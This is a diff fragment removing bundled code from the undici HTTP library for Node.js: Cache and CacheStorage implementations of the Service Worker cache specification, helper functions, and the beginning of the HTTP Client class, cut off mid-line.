type - * @property {any} request - * @property {any} response - * @property {import('../../types/cache').CacheQueryOptions} options - */ - -/** - * @see https://w3c.github.io/ServiceWorker/#dfn-request-response-list - * @typedef {[any, any][]} requestResponseList - */ - -class Cache { - /** - * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-request-response-list - * @type {requestResponseList} - */ - #relevantRequestResponseList - - constructor () { - if 
(arguments[0] !== kConstruct) { - webidl.illegalConstructor() - } - - this.#relevantRequestResponseList = arguments[1] - } - - async match (request, options = {}) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.match' }) - - request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - const p = await this.matchAll(request, options) - - if (p.length === 0) { - return - } - - return p[0] - } - - async matchAll (request = undefined, options = {}) { - webidl.brandCheck(this, Cache) - - if (request !== undefined) request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - // 1. - let r = null - - // 2. - if (request !== undefined) { - if (request instanceof Request) { - // 2.1.1 - r = request[kState] - - // 2.1.2 - if (r.method !== 'GET' && !options.ignoreMethod) { - return [] - } - } else if (typeof request === 'string') { - // 2.2.1 - r = new Request(request)[kState] - } - } - - // 5. - // 5.1 - const responses = [] - - // 5.2 - if (request === undefined) { - // 5.2.1 - for (const requestResponse of this.#relevantRequestResponseList) { - responses.push(requestResponse[1]) - } - } else { // 5.3 - // 5.3.1 - const requestResponses = this.#queryCache(r, options) - - // 5.3.2 - for (const requestResponse of requestResponses) { - responses.push(requestResponse[1]) - } - } - - // 5.4 - // We don't implement CORs so we don't need to loop over the responses, yay! - - // 5.5.1 - const responseList = [] - - // 5.5.2 - for (const response of responses) { - // 5.5.2.1 - const responseObject = new Response(response.body?.source ?? null) - const body = responseObject[kState].body - responseObject[kState] = response - responseObject[kState].body = body - responseObject[kHeaders][kHeadersList] = response.headersList - responseObject[kHeaders][kGuard] = 'immutable' - - responseList.push(responseObject) - } - - // 6. 
- return Object.freeze(responseList) - } - - async add (request) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.add' }) - - request = webidl.converters.RequestInfo(request) - - // 1. - const requests = [request] - - // 2. - const responseArrayPromise = this.addAll(requests) - - // 3. - return await responseArrayPromise - } - - async addAll (requests) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.addAll' }) - - requests = webidl.converters['sequence'](requests) - - // 1. - const responsePromises = [] - - // 2. - const requestList = [] - - // 3. - for (const request of requests) { - if (typeof request === 'string') { - continue - } - - // 3.1 - const r = request[kState] - - // 3.2 - if (!urlIsHttpHttpsScheme(r.url) || r.method !== 'GET') { - throw webidl.errors.exception({ - header: 'Cache.addAll', - message: 'Expected http/s scheme when method is not GET.' - }) - } - } - - // 4. - /** @type {ReturnType[]} */ - const fetchControllers = [] - - // 5. - for (const request of requests) { - // 5.1 - const r = new Request(request)[kState] - - // 5.2 - if (!urlIsHttpHttpsScheme(r.url)) { - throw webidl.errors.exception({ - header: 'Cache.addAll', - message: 'Expected http/s scheme.' - }) - } - - // 5.4 - r.initiator = 'fetch' - r.destination = 'subresource' - - // 5.5 - requestList.push(r) - - // 5.6 - const responsePromise = createDeferredPromise() - - // 5.7 - fetchControllers.push(fetching({ - request: r, - dispatcher: getGlobalDispatcher(), - processResponse (response) { - // 1. - if (response.type === 'error' || response.status === 206 || response.status < 200 || response.status > 299) { - responsePromise.reject(webidl.errors.exception({ - header: 'Cache.addAll', - message: 'Received an invalid status code or the request failed.' - })) - } else if (response.headersList.contains('vary')) { // 2. 
- // 2.1 - const fieldValues = getFieldValues(response.headersList.get('vary')) - - // 2.2 - for (const fieldValue of fieldValues) { - // 2.2.1 - if (fieldValue === '*') { - responsePromise.reject(webidl.errors.exception({ - header: 'Cache.addAll', - message: 'invalid vary field value' - })) - - for (const controller of fetchControllers) { - controller.abort() - } - - return - } - } - } - }, - processResponseEndOfBody (response) { - // 1. - if (response.aborted) { - responsePromise.reject(new DOMException('aborted', 'AbortError')) - return - } - - // 2. - responsePromise.resolve(response) - } - })) - - // 5.8 - responsePromises.push(responsePromise.promise) - } - - // 6. - const p = Promise.all(responsePromises) - - // 7. - const responses = await p - - // 7.1 - const operations = [] - - // 7.2 - let index = 0 - - // 7.3 - for (const response of responses) { - // 7.3.1 - /** @type {CacheBatchOperation} */ - const operation = { - type: 'put', // 7.3.2 - request: requestList[index], // 7.3.3 - response // 7.3.4 - } - - operations.push(operation) // 7.3.5 - - index++ // 7.3.6 - } - - // 7.5 - const cacheJobPromise = createDeferredPromise() - - // 7.6.1 - let errorData = null - - // 7.6.2 - try { - this.#batchCacheOperations(operations) - } catch (e) { - errorData = e - } - - // 7.6.3 - queueMicrotask(() => { - // 7.6.3.1 - if (errorData === null) { - cacheJobPromise.resolve(undefined) - } else { - // 7.6.3.2 - cacheJobPromise.reject(errorData) - } - }) - - // 7.7 - return cacheJobPromise.promise - } - - async put (request, response) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 2, { header: 'Cache.put' }) - - request = webidl.converters.RequestInfo(request) - response = webidl.converters.Response(response) - - // 1. - let innerRequest = null - - // 2. - if (request instanceof Request) { - innerRequest = request[kState] - } else { // 3. - innerRequest = new Request(request)[kState] - } - - // 4. 
- if (!urlIsHttpHttpsScheme(innerRequest.url) || innerRequest.method !== 'GET') { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Expected an http/s scheme when method is not GET' - }) - } - - // 5. - const innerResponse = response[kState] - - // 6. - if (innerResponse.status === 206) { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Got 206 status' - }) - } - - // 7. - if (innerResponse.headersList.contains('vary')) { - // 7.1. - const fieldValues = getFieldValues(innerResponse.headersList.get('vary')) - - // 7.2. - for (const fieldValue of fieldValues) { - // 7.2.1 - if (fieldValue === '*') { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Got * vary field value' - }) - } - } - } - - // 8. - if (innerResponse.body && (isDisturbed(innerResponse.body.stream) || innerResponse.body.stream.locked)) { - throw webidl.errors.exception({ - header: 'Cache.put', - message: 'Response body is locked or disturbed' - }) - } - - // 9. - const clonedResponse = cloneResponse(innerResponse) - - // 10. - const bodyReadPromise = createDeferredPromise() - - // 11. - if (innerResponse.body != null) { - // 11.1 - const stream = innerResponse.body.stream - - // 11.2 - const reader = stream.getReader() - - // 11.3 - readAllBytes(reader).then(bodyReadPromise.resolve, bodyReadPromise.reject) - } else { - bodyReadPromise.resolve(undefined) - } - - // 12. - /** @type {CacheBatchOperation[]} */ - const operations = [] - - // 13. - /** @type {CacheBatchOperation} */ - const operation = { - type: 'put', // 14. - request: innerRequest, // 15. - response: clonedResponse // 16. - } - - // 17. - operations.push(operation) - - // 19. 
- const bytes = await bodyReadPromise.promise - - if (clonedResponse.body != null) { - clonedResponse.body.source = bytes - } - - // 19.1 - const cacheJobPromise = createDeferredPromise() - - // 19.2.1 - let errorData = null - - // 19.2.2 - try { - this.#batchCacheOperations(operations) - } catch (e) { - errorData = e - } - - // 19.2.3 - queueMicrotask(() => { - // 19.2.3.1 - if (errorData === null) { - cacheJobPromise.resolve() - } else { // 19.2.3.2 - cacheJobPromise.reject(errorData) - } - }) - - return cacheJobPromise.promise - } - - async delete (request, options = {}) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.delete' }) - - request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - /** - * @type {Request} - */ - let r = null - - if (request instanceof Request) { - r = request[kState] - - if (r.method !== 'GET' && !options.ignoreMethod) { - return false - } - } else { - assert(typeof request === 'string') - - r = new Request(request)[kState] - } - - /** @type {CacheBatchOperation[]} */ - const operations = [] - - /** @type {CacheBatchOperation} */ - const operation = { - type: 'delete', - request: r, - options - } - - operations.push(operation) - - const cacheJobPromise = createDeferredPromise() - - let errorData = null - let requestResponses - - try { - requestResponses = this.#batchCacheOperations(operations) - } catch (e) { - errorData = e - } - - queueMicrotask(() => { - if (errorData === null) { - cacheJobPromise.resolve(!!requestResponses?.length) - } else { - cacheJobPromise.reject(errorData) - } - }) - - return cacheJobPromise.promise - } - - /** - * @see https://w3c.github.io/ServiceWorker/#dom-cache-keys - * @param {any} request - * @param {import('../../types/cache').CacheQueryOptions} options - * @returns {readonly Request[]} - */ - async keys (request = undefined, options = {}) { - webidl.brandCheck(this, Cache) - - if (request !== undefined) 
request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - // 1. - let r = null - - // 2. - if (request !== undefined) { - // 2.1 - if (request instanceof Request) { - // 2.1.1 - r = request[kState] - - // 2.1.2 - if (r.method !== 'GET' && !options.ignoreMethod) { - return [] - } - } else if (typeof request === 'string') { // 2.2 - r = new Request(request)[kState] - } - } - - // 4. - const promise = createDeferredPromise() - - // 5. - // 5.1 - const requests = [] - - // 5.2 - if (request === undefined) { - // 5.2.1 - for (const requestResponse of this.#relevantRequestResponseList) { - // 5.2.1.1 - requests.push(requestResponse[0]) - } - } else { // 5.3 - // 5.3.1 - const requestResponses = this.#queryCache(r, options) - - // 5.3.2 - for (const requestResponse of requestResponses) { - // 5.3.2.1 - requests.push(requestResponse[0]) - } - } - - // 5.4 - queueMicrotask(() => { - // 5.4.1 - const requestList = [] - - // 5.4.2 - for (const request of requests) { - const requestObject = new Request('https://a') - requestObject[kState] = request - requestObject[kHeaders][kHeadersList] = request.headersList - requestObject[kHeaders][kGuard] = 'immutable' - requestObject[kRealm] = request.client - - // 5.4.2.1 - requestList.push(requestObject) - } - - // 5.4.3 - promise.resolve(Object.freeze(requestList)) - }) - - return promise.promise - } - - /** - * @see https://w3c.github.io/ServiceWorker/#batch-cache-operations-algorithm - * @param {CacheBatchOperation[]} operations - * @returns {requestResponseList} - */ - #batchCacheOperations (operations) { - // 1. - const cache = this.#relevantRequestResponseList - - // 2. - const backupCache = [...cache] - - // 3. 
- const addedItems = [] - - // 4.1 - const resultList = [] - - try { - // 4.2 - for (const operation of operations) { - // 4.2.1 - if (operation.type !== 'delete' && operation.type !== 'put') { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'operation type does not match "delete" or "put"' - }) - } - - // 4.2.2 - if (operation.type === 'delete' && operation.response != null) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'delete operation should not have an associated response' - }) - } - - // 4.2.3 - if (this.#queryCache(operation.request, operation.options, addedItems).length) { - throw new DOMException('???', 'InvalidStateError') - } - - // 4.2.4 - let requestResponses - - // 4.2.5 - if (operation.type === 'delete') { - // 4.2.5.1 - requestResponses = this.#queryCache(operation.request, operation.options) - - // TODO: the spec is wrong, this is needed to pass WPTs - if (requestResponses.length === 0) { - return [] - } - - // 4.2.5.2 - for (const requestResponse of requestResponses) { - const idx = cache.indexOf(requestResponse) - assert(idx !== -1) - - // 4.2.5.2.1 - cache.splice(idx, 1) - } - } else if (operation.type === 'put') { // 4.2.6 - // 4.2.6.1 - if (operation.response == null) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'put operation should have an associated response' - }) - } - - // 4.2.6.2 - const r = operation.request - - // 4.2.6.3 - if (!urlIsHttpHttpsScheme(r.url)) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'expected http or https scheme' - }) - } - - // 4.2.6.4 - if (r.method !== 'GET') { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'not get method' - }) - } - - // 4.2.6.5 - if (operation.options != null) { - throw webidl.errors.exception({ - header: 'Cache.#batchCacheOperations', - message: 'options must not be defined' - }) - } - - // 
4.2.6.6 - requestResponses = this.#queryCache(operation.request) - - // 4.2.6.7 - for (const requestResponse of requestResponses) { - const idx = cache.indexOf(requestResponse) - assert(idx !== -1) - - // 4.2.6.7.1 - cache.splice(idx, 1) - } - - // 4.2.6.8 - cache.push([operation.request, operation.response]) - - // 4.2.6.10 - addedItems.push([operation.request, operation.response]) - } - - // 4.2.7 - resultList.push([operation.request, operation.response]) - } - - // 4.3 - return resultList - } catch (e) { // 5. - // 5.1 - this.#relevantRequestResponseList.length = 0 - - // 5.2 - this.#relevantRequestResponseList = backupCache - - // 5.3 - throw e - } - } - - /** - * @see https://w3c.github.io/ServiceWorker/#query-cache - * @param {any} requestQuery - * @param {import('../../types/cache').CacheQueryOptions} options - * @param {requestResponseList} targetStorage - * @returns {requestResponseList} - */ - #queryCache (requestQuery, options, targetStorage) { - /** @type {requestResponseList} */ - const resultList = [] - - const storage = targetStorage ?? 
this.#relevantRequestResponseList - - for (const requestResponse of storage) { - const [cachedRequest, cachedResponse] = requestResponse - if (this.#requestMatchesCachedItem(requestQuery, cachedRequest, cachedResponse, options)) { - resultList.push(requestResponse) - } - } - - return resultList - } - - /** - * @see https://w3c.github.io/ServiceWorker/#request-matches-cached-item-algorithm - * @param {any} requestQuery - * @param {any} request - * @param {any | null} response - * @param {import('../../types/cache').CacheQueryOptions | undefined} options - * @returns {boolean} - */ - #requestMatchesCachedItem (requestQuery, request, response = null, options) { - // if (options?.ignoreMethod === false && request.method === 'GET') { - // return false - // } - - const queryURL = new URL(requestQuery.url) - - const cachedURL = new URL(request.url) - - if (options?.ignoreSearch) { - cachedURL.search = '' - - queryURL.search = '' - } - - if (!urlEquals(queryURL, cachedURL, true)) { - return false - } - - if ( - response == null || - options?.ignoreVary || - !response.headersList.contains('vary') - ) { - return true - } - - const fieldValues = getFieldValues(response.headersList.get('vary')) - - for (const fieldValue of fieldValues) { - if (fieldValue === '*') { - return false - } - - const requestValue = request.headersList.get(fieldValue) - const queryValue = requestQuery.headersList.get(fieldValue) - - // If one has the header and the other doesn't, or one has - // a different value than the other, return false - if (requestValue !== queryValue) { - return false - } - } - - return true - } -} - -Object.defineProperties(Cache.prototype, { - [Symbol.toStringTag]: { - value: 'Cache', - configurable: true - }, - match: kEnumerableProperty, - matchAll: kEnumerableProperty, - add: kEnumerableProperty, - addAll: kEnumerableProperty, - put: kEnumerableProperty, - delete: kEnumerableProperty, - keys: kEnumerableProperty -}) - -const cacheQueryOptionConverters = [ - { - key: 
'ignoreSearch', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'ignoreMethod', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'ignoreVary', - converter: webidl.converters.boolean, - defaultValue: false - } -] - -webidl.converters.CacheQueryOptions = webidl.dictionaryConverter(cacheQueryOptionConverters) - -webidl.converters.MultiCacheQueryOptions = webidl.dictionaryConverter([ - ...cacheQueryOptionConverters, - { - key: 'cacheName', - converter: webidl.converters.DOMString - } -]) - -webidl.converters.Response = webidl.interfaceConverter(Response) - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.RequestInfo -) - -module.exports = { - Cache -} - - -/***/ }), - -/***/ 7907: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kConstruct } = __nccwpck_require__(9174) -const { Cache } = __nccwpck_require__(6101) -const { webidl } = __nccwpck_require__(1744) -const { kEnumerableProperty } = __nccwpck_require__(3983) - -class CacheStorage { - /** - * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-name-to-cache-map - * @type {Map} - */ - async has (cacheName) { - webidl.brandCheck(this, CacheStorage) - webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.has' }) - - cacheName = webidl.converters.DOMString(cacheName) - - // 2.1.1 - // 2.2 - return this.#caches.has(cacheName) - } - - /** - * @see https://w3c.github.io/ServiceWorker/#dom-cachestorage-open - * @param {string} cacheName - * @returns {Promise} - */ - async open (cacheName) { - webidl.brandCheck(this, CacheStorage) - webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.open' }) - - cacheName = webidl.converters.DOMString(cacheName) - - // 2.1 - if (this.#caches.has(cacheName)) { - // await caches.open('v1') !== await caches.open('v1') - - // 2.1.1 - const cache = this.#caches.get(cacheName) - - // 2.1.1.1 - return new Cache(kConstruct, cache) 
- } - - // 2.2 - const cache = [] - - // 2.3 - this.#caches.set(cacheName, cache) - - // 2.4 - return new Cache(kConstruct, cache) - } - - /** - * @see https://w3c.github.io/ServiceWorker/#cache-storage-delete - * @param {string} cacheName - * @returns {Promise} - */ - async delete (cacheName) { - webidl.brandCheck(this, CacheStorage) - webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.delete' }) - - cacheName = webidl.converters.DOMString(cacheName) - - return this.#caches.delete(cacheName) - } - - /** - * @see https://w3c.github.io/ServiceWorker/#cache-storage-keys - * @returns {string[]} - */ - async keys () { - webidl.brandCheck(this, CacheStorage) - - // 2.1 - const keys = this.#caches.keys() - - // 2.2 - return [...keys] - } -} - -Object.defineProperties(CacheStorage.prototype, { - [Symbol.toStringTag]: { - value: 'CacheStorage', - configurable: true - }, - match: kEnumerableProperty, - has: kEnumerableProperty, - open: kEnumerableProperty, - delete: kEnumerableProperty, - keys: kEnumerableProperty -}) - -module.exports = { - CacheStorage -} - - -/***/ }), - -/***/ 9174: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -module.exports = { - kConstruct: (__nccwpck_require__(2785).kConstruct) -} - - -/***/ }), - -/***/ 2396: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const assert = __nccwpck_require__(9491) -const { URLSerializer } = __nccwpck_require__(685) -const { isValidHeaderName } = __nccwpck_require__(2538) - -/** - * @see https://url.spec.whatwg.org/#concept-url-equals - * @param {URL} A - * @param {URL} B - * @param {boolean | undefined} excludeFragment - * @returns {boolean} - */ -function urlEquals (A, B, excludeFragment = false) { - const serializedA = URLSerializer(A, excludeFragment) - - const serializedB = URLSerializer(B, excludeFragment) - - return serializedA === serializedB -} - -/** - * @see 
https://github.com/chromium/chromium/blob/694d20d134cb553d8d89e5500b9148012b1ba299/content/browser/cache_storage/cache_storage_cache.cc#L260-L262 - * @param {string} header - */ -function fieldValues (header) { - assert(header !== null) - - const values = [] - - for (let value of header.split(',')) { - value = value.trim() - - if (!value.length) { - continue - } else if (!isValidHeaderName(value)) { - continue - } - - values.push(value) - } - - return values -} - -module.exports = { - urlEquals, - fieldValues -} - - -/***/ }), - -/***/ 3598: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// @ts-check - - - -/* global WebAssembly */ - -const assert = __nccwpck_require__(9491) -const net = __nccwpck_require__(1808) -const http = __nccwpck_require__(3685) -const { pipeline } = __nccwpck_require__(2781) -const util = __nccwpck_require__(3983) -const timers = __nccwpck_require__(9459) -const Request = __nccwpck_require__(2905) -const DispatcherBase = __nccwpck_require__(4839) -const { - RequestContentLengthMismatchError, - ResponseContentLengthMismatchError, - InvalidArgumentError, - RequestAbortedError, - HeadersTimeoutError, - HeadersOverflowError, - SocketError, - InformationalError, - BodyTimeoutError, - HTTPParserError, - ResponseExceededMaxSizeError, - ClientDestroyedError -} = __nccwpck_require__(8045) -const buildConnector = __nccwpck_require__(2067) -const { - kUrl, - kReset, - kServerName, - kClient, - kBusy, - kParser, - kConnect, - kBlocking, - kResuming, - kRunning, - kPending, - kSize, - kWriting, - kQueue, - kConnected, - kConnecting, - kNeedDrain, - kNoRef, - kKeepAliveDefaultTimeout, - kHostHeader, - kPendingIdx, - kRunningIdx, - kError, - kPipelining, - kSocket, - kKeepAliveTimeoutValue, - kMaxHeadersSize, - kKeepAliveMaxTimeout, - kKeepAliveTimeoutThreshold, - kHeadersTimeout, - kBodyTimeout, - kStrictContentLength, - kConnector, - kMaxRedirections, - kMaxRequests, - kCounter, - kClose, - kDestroy, - kDispatch, 
- kInterceptors, - kLocalAddress, - kMaxResponseSize, - kHTTPConnVersion, - // HTTP2 - kHost, - kHTTP2Session, - kHTTP2SessionState, - kHTTP2BuildRequest, - kHTTP2CopyHeaders, - kHTTP1BuildRequest -} = __nccwpck_require__(2785) - -/** @type {import('http2')} */ -let http2 -try { - http2 = __nccwpck_require__(5158) -} catch { - // @ts-ignore - http2 = { constants: {} } -} - -const { - constants: { - HTTP2_HEADER_AUTHORITY, - HTTP2_HEADER_METHOD, - HTTP2_HEADER_PATH, - HTTP2_HEADER_SCHEME, - HTTP2_HEADER_CONTENT_LENGTH, - HTTP2_HEADER_EXPECT, - HTTP2_HEADER_STATUS - } -} = http2 - -// Experimental -let h2ExperimentalWarned = false - -const FastBuffer = Buffer[Symbol.species] - -const kClosedResolve = Symbol('kClosedResolve') - -const channels = {} - -try { - const diagnosticsChannel = __nccwpck_require__(7643) - channels.sendHeaders = diagnosticsChannel.channel('undici:client:sendHeaders') - channels.beforeConnect = diagnosticsChannel.channel('undici:client:beforeConnect') - channels.connectError = diagnosticsChannel.channel('undici:client:connectError') - channels.connected = diagnosticsChannel.channel('undici:client:connected') -} catch { - channels.sendHeaders = { hasSubscribers: false } - channels.beforeConnect = { hasSubscribers: false } - channels.connectError = { hasSubscribers: false } - channels.connected = { hasSubscribers: false } -} - -/** - * @type {import('../types/client').default} - */ -class Client extends DispatcherBase { - /** - * - * @param {string|URL} url - * @param {import('../types/client').Client.Options} options - */ - constructor (url, { - interceptors, - maxHeaderSize, - headersTimeout, - socketTimeout, - requestTimeout, - connectTimeout, - bodyTimeout, - idleTimeout, - keepAlive, - keepAliveTimeout, - maxKeepAliveTimeout, - keepAliveMaxTimeout, - keepAliveTimeoutThreshold, - socketPath, - pipelining, - tls, - strictContentLength, - maxCachedSessions, - maxRedirections, - connect, - maxRequestsPerClient, - localAddress, - maxResponseSize, 
- autoSelectFamily, - autoSelectFamilyAttemptTimeout, - // h2 - allowH2, - maxConcurrentStreams - } = {}) { - super() - - if (keepAlive !== undefined) { - throw new InvalidArgumentError('unsupported keepAlive, use pipelining=0 instead') - } - - if (socketTimeout !== undefined) { - throw new InvalidArgumentError('unsupported socketTimeout, use headersTimeout & bodyTimeout instead') - } - - if (requestTimeout !== undefined) { - throw new InvalidArgumentError('unsupported requestTimeout, use headersTimeout & bodyTimeout instead') - } - - if (idleTimeout !== undefined) { - throw new InvalidArgumentError('unsupported idleTimeout, use keepAliveTimeout instead') - } - - if (maxKeepAliveTimeout !== undefined) { - throw new InvalidArgumentError('unsupported maxKeepAliveTimeout, use keepAliveMaxTimeout instead') - } - - if (maxHeaderSize != null && !Number.isFinite(maxHeaderSize)) { - throw new InvalidArgumentError('invalid maxHeaderSize') - } - - if (socketPath != null && typeof socketPath !== 'string') { - throw new InvalidArgumentError('invalid socketPath') - } - - if (connectTimeout != null && (!Number.isFinite(connectTimeout) || connectTimeout < 0)) { - throw new InvalidArgumentError('invalid connectTimeout') - } - - if (keepAliveTimeout != null && (!Number.isFinite(keepAliveTimeout) || keepAliveTimeout <= 0)) { - throw new InvalidArgumentError('invalid keepAliveTimeout') - } - - if (keepAliveMaxTimeout != null && (!Number.isFinite(keepAliveMaxTimeout) || keepAliveMaxTimeout <= 0)) { - throw new InvalidArgumentError('invalid keepAliveMaxTimeout') - } - - if (keepAliveTimeoutThreshold != null && !Number.isFinite(keepAliveTimeoutThreshold)) { - throw new InvalidArgumentError('invalid keepAliveTimeoutThreshold') - } - - if (headersTimeout != null && (!Number.isInteger(headersTimeout) || headersTimeout < 0)) { - throw new InvalidArgumentError('headersTimeout must be a positive integer or zero') - } - - if (bodyTimeout != null && (!Number.isInteger(bodyTimeout) || 
bodyTimeout < 0)) { - throw new InvalidArgumentError('bodyTimeout must be a positive integer or zero') - } - - if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { - throw new InvalidArgumentError('connect must be a function or an object') - } - - if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { - throw new InvalidArgumentError('maxRedirections must be a positive number') - } - - if (maxRequestsPerClient != null && (!Number.isInteger(maxRequestsPerClient) || maxRequestsPerClient < 0)) { - throw new InvalidArgumentError('maxRequestsPerClient must be a positive number') - } - - if (localAddress != null && (typeof localAddress !== 'string' || net.isIP(localAddress) === 0)) { - throw new InvalidArgumentError('localAddress must be valid string IP address') - } - - if (maxResponseSize != null && (!Number.isInteger(maxResponseSize) || maxResponseSize < -1)) { - throw new InvalidArgumentError('maxResponseSize must be a positive number') - } - - if ( - autoSelectFamilyAttemptTimeout != null && - (!Number.isInteger(autoSelectFamilyAttemptTimeout) || autoSelectFamilyAttemptTimeout < -1) - ) { - throw new InvalidArgumentError('autoSelectFamilyAttemptTimeout must be a positive number') - } - - // h2 - if (allowH2 != null && typeof allowH2 !== 'boolean') { - throw new InvalidArgumentError('allowH2 must be a valid boolean value') - } - - if (maxConcurrentStreams != null && (typeof maxConcurrentStreams !== 'number' || maxConcurrentStreams < 1)) { - throw new InvalidArgumentError('maxConcurrentStreams must be a possitive integer, greater than 0') - } - - if (typeof connect !== 'function') { - connect = buildConnector({ - ...tls, - maxCachedSessions, - allowH2, - socketPath, - timeout: connectTimeout, - ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? 
{ autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), - ...connect - }) - } - - this[kInterceptors] = interceptors && interceptors.Client && Array.isArray(interceptors.Client) - ? interceptors.Client - : [createRedirectInterceptor({ maxRedirections })] - this[kUrl] = util.parseOrigin(url) - this[kConnector] = connect - this[kSocket] = null - this[kPipelining] = pipelining != null ? pipelining : 1 - this[kMaxHeadersSize] = maxHeaderSize || http.maxHeaderSize - this[kKeepAliveDefaultTimeout] = keepAliveTimeout == null ? 4e3 : keepAliveTimeout - this[kKeepAliveMaxTimeout] = keepAliveMaxTimeout == null ? 600e3 : keepAliveMaxTimeout - this[kKeepAliveTimeoutThreshold] = keepAliveTimeoutThreshold == null ? 1e3 : keepAliveTimeoutThreshold - this[kKeepAliveTimeoutValue] = this[kKeepAliveDefaultTimeout] - this[kServerName] = null - this[kLocalAddress] = localAddress != null ? localAddress : null - this[kResuming] = 0 // 0, idle, 1, scheduled, 2 resuming - this[kNeedDrain] = 0 // 0, idle, 1, scheduled, 2 resuming - this[kHostHeader] = `host: ${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}\r\n` - this[kBodyTimeout] = bodyTimeout != null ? bodyTimeout : 300e3 - this[kHeadersTimeout] = headersTimeout != null ? headersTimeout : 300e3 - this[kStrictContentLength] = strictContentLength == null ? true : strictContentLength - this[kMaxRedirections] = maxRedirections - this[kMaxRequests] = maxRequestsPerClient - this[kClosedResolve] = null - this[kMaxResponseSize] = maxResponseSize > -1 ? maxResponseSize : -1 - this[kHTTPConnVersion] = 'h1' - - // HTTP/2 - this[kHTTP2Session] = null - this[kHTTP2SessionState] = !allowH2 - ? null - : { - // streams: null, // Fixed queue of streams - For future support of `push` - openStreams: 0, // Keep track of them to decide wether or not unref the session - maxConcurrentStreams: maxConcurrentStreams != null ? 
maxConcurrentStreams : 100 // Max peerConcurrentStreams for a Node h2 server - } - this[kHost] = `${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}` - - // kQueue is built up of 3 sections separated by - // the kRunningIdx and kPendingIdx indices. - // | complete | running | pending | - // ^ kRunningIdx ^ kPendingIdx ^ kQueue.length - // kRunningIdx points to the first running element. - // kPendingIdx points to the first pending element. - // This implements a fast queue with an amortized - // time of O(1). - - this[kQueue] = [] - this[kRunningIdx] = 0 - this[kPendingIdx] = 0 - } - - get pipelining () { - return this[kPipelining] - } - - set pipelining (value) { - this[kPipelining] = value - resume(this, true) - } - - get [kPending] () { - return this[kQueue].length - this[kPendingIdx] - } - - get [kRunning] () { - return this[kPendingIdx] - this[kRunningIdx] - } - - get [kSize] () { - return this[kQueue].length - this[kRunningIdx] - } - - get [kConnected] () { - return !!this[kSocket] && !this[kConnecting] && !this[kSocket].destroyed - } - - get [kBusy] () { - const socket = this[kSocket] - return ( - (socket && (socket[kReset] || socket[kWriting] || socket[kBlocking])) || - (this[kSize] >= (this[kPipelining] || 1)) || - this[kPending] > 0 - ) - } - - /* istanbul ignore: only used for test */ - [kConnect] (cb) { - connect(this) - this.once('connect', cb) - } - - [kDispatch] (opts, handler) { - const origin = opts.origin || this[kUrl].origin - - const request = this[kHTTPConnVersion] === 'h2' - ? Request[kHTTP2BuildRequest](origin, opts, handler) - : Request[kHTTP1BuildRequest](origin, opts, handler) - - this[kQueue].push(request) - if (this[kResuming]) { - // Do nothing. - } else if (util.bodyLength(request.body) == null && util.isIterable(request.body)) { - // Wait a tick in case stream/iterator is ended in the same tick. 
- this[kResuming] = 1 - process.nextTick(resume, this) - } else { - resume(this, true) - } - - if (this[kResuming] && this[kNeedDrain] !== 2 && this[kBusy]) { - this[kNeedDrain] = 2 - } - - return this[kNeedDrain] < 2 - } - - async [kClose] () { - // TODO: for H2 we need to gracefully flush the remaining enqueued - // request and close each stream. - return new Promise((resolve) => { - if (!this[kSize]) { - resolve(null) - } else { - this[kClosedResolve] = resolve - } - }) - } - - async [kDestroy] (err) { - return new Promise((resolve) => { - const requests = this[kQueue].splice(this[kPendingIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(this, request, err) - } - - const callback = () => { - if (this[kClosedResolve]) { - // TODO (fix): Should we error here with ClientDestroyedError? - this[kClosedResolve]() - this[kClosedResolve] = null - } - resolve() - } - - if (this[kHTTP2Session] != null) { - util.destroy(this[kHTTP2Session], err) - this[kHTTP2Session] = null - this[kHTTP2SessionState] = null - } - - if (!this[kSocket]) { - queueMicrotask(callback) - } else { - util.destroy(this[kSocket].on('close', callback), err) - } - - resume(this) - }) - } -} - -function onHttp2SessionError (err) { - assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') - - this[kSocket][kError] = err - - onError(this[kClient], err) -} - -function onHttp2FrameError (type, code, id) { - const err = new InformationalError(`HTTP/2: 